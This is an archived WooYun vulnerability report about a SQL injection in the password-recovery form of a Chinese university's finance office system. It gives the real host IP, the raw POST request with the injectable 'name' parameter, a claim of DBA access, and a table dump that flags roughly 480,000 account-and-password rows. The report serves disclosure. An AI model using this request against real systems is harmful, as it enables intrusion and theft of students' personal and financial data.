乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-19: 细节已通知厂商并且等待厂商处理中 2015-10-21: 厂商已经确认,细节仅向厂商公开 2015-10-31: 细节向核心白帽子及相关领域专家公开 2015-11-10: 细节向普通白帽子公开 2015-11-20: 细节向实习白帽子公开 2015-12-05: 细节向公众公开
rt
好吧 这次是计财处一个注入点 导致全库信息泄露 计财处的数据库。。。咳咳。。东西确实多
POST的注入
POST /pages/User/findPass.do HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*Referer: http://202.115.200.140:8082/pages/User/findPass.doAccept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: 202.115.200.140:8082Content-Length: 26Pragma: no-cacheCookie: JSESSIONID=C251CAB5EB301A27961B08521B281697id=&step=1&name=2014110306
name 存在注入
DBA权限:
21库:
看看其中的一个STUDENT 库:141张表
Database: STUDENT[141 tables]+------------------------+---------+| Table | Entries |+------------------------+---------+| ZT_CJ_INFO_CHANGE | 11105462|| S_UPDATELOG | 4365071 || SF_QFDB | 1826115 || SF_YSK | 1826115 || SF_SFDMX | 1618157 || SF_ZZ | 713811 || SF_SFDB | 543828 || ZWXMJE | 509639 || USER_ROLE | 486181 || S_USER | 486065 | 这里是账号和密码 48w条| JZJ_FFSJ | 402865 || ZWPZB | 274624 || SF_XSQF | 252711 || PXSJZ | 244328 || JZJ_ZCXX | 209501 || PXSDM | 208953 || DG_JCKJS | 110653 || ZWNEW_ZWXMZD | 90834 || SF_SFDMX_BAK | 79660 || ZWXMZD | 62732 || ONLINE_USER | 61196 || JZJ_ZCXX_EDIT | 57781 || ZT_CJ_INFO | 52200 || SF_TFDMX | 48180 || SF_TFDB | 42495 || TB_JWXT | 35472 || TB_CJXT | 35421 || TB_YJSXT | 35421 || CJ_FP_FY_YFP | 30172 || S_USER_INFO | 26738 || JZJ_ZCXX_UPDATE | 26505 || CJ_FP_DK | 24991 || TEMP_XJXH | 9670 || JZJ_CHECK_HIS | 7726 || DG_JCK | 7701 || ZC_RESULT_BAK | 7341 || PBJDM | 5983 || ZWKMZD | 5490 || ZC_RESULT_BAK_20131001 | 4978 || PZGDM | 4530 || SF_JMDMX | 3665 || SF_JMDB | 3611 || SUGGEST | 2767 || GUEST | 2266 || PZGQX | 1364 || CW_JZJ_BAK | 1204 || PZYDM_NEW | 1093 || ZC_RESULT | 1043 || TB_YXXT | 958 || CJ_ZY_SFXM | 942 || ZWBMZD | 832 || ROLE_RESOURCE | 618 || ZWPZBH | 582 || ZWNEW_ZWKMZD | 578 || CJ_FPBL | 551 || JZJ_BASE | 541 || ZC_RESULT20131105 | 487 || ZC_RESULT_2013004 | 487 || ZT_CJ_ZY_CHANGE | 415 || CJ_FP_MX | 331 || NEWSINFO | 260 || S_RESOURCE | 196 || ZWNEW_ZWXMLX | 194 || CJ_YSKDM | 175 || MYTEMP | 157 || ZWNEW_ZWBMZD | 110 || PBMDM | 101 || ZGBM | 76 || PSFXM | 68 || CW_ZXDK_GJ_BAK | 60 || ZWNEW_ZWXMLB | 41 || CJ_BXXS | 36 || JZJ_FFSJ_BAK | 34 || PSFQJ | 33 || CJ_BJDM | 31 || CW_FZZ | 24 || S_ROLE | 24 || PXSXZ | 21 || CJ_FZBMDM | 18 || DBCONFIG | 16 || NEWSTYPE | 16 || PXSLY | 14 || DM_BASE_STATUS | 13 || JZJ_XMLX | 11 || BMLINK | 10 || QRTZ_CRON_TRIGGERS | 10 || QRTZ_JOB_DETAILS | 10 || QRTZ_TRIGGERS | 10 || TB_PZGDM | 10 || SMS_OTHER_SEND | 9 || PPYCC | 8 || PXSZT | 8 || CW_ZXDK_GJ | 7 || DM_FFDXLX | 7 || USER_TYPE | 7 || JZJ_BASE_BAK | 6 || WEBARGS | 6 || CW_INIT | 5 || DM_ZJXZ | 5 || QRTZ_LOCKS | 5 || ZC_ID | 5 || ZXDK_GJ_BAK | 5 || CJ_JD_XS | 4 || CJ_LX | 4 || DM_FFSJ_ISSH | 4 || PYHDM | 4 || CJ_BXMS | 3 || CW_ZXDK_SYD | 3 || JZJ_FFFS | 3 || P_MEMO | 3 || TB_JZJ_FFSJ | 3 || ZXDK_GJ | 3 || ZXDK_SYD | 3 || SMS_OTHER_SEND_BAK | 2 || ZC_FILE | 2 || ZXDK_SYD_BAK | 2 || CJ_FP_DM_SFND | 1 || CJ_FPBL_MEMO | 1 || SMS_CONFIG | 1 |+------------------------+---------+
库里面的其他信息我就不点明了
这次影响算严重吧
危害等级:高
漏洞Rank:15
确认时间:2015-10-21 14:42
感谢支持!
暂无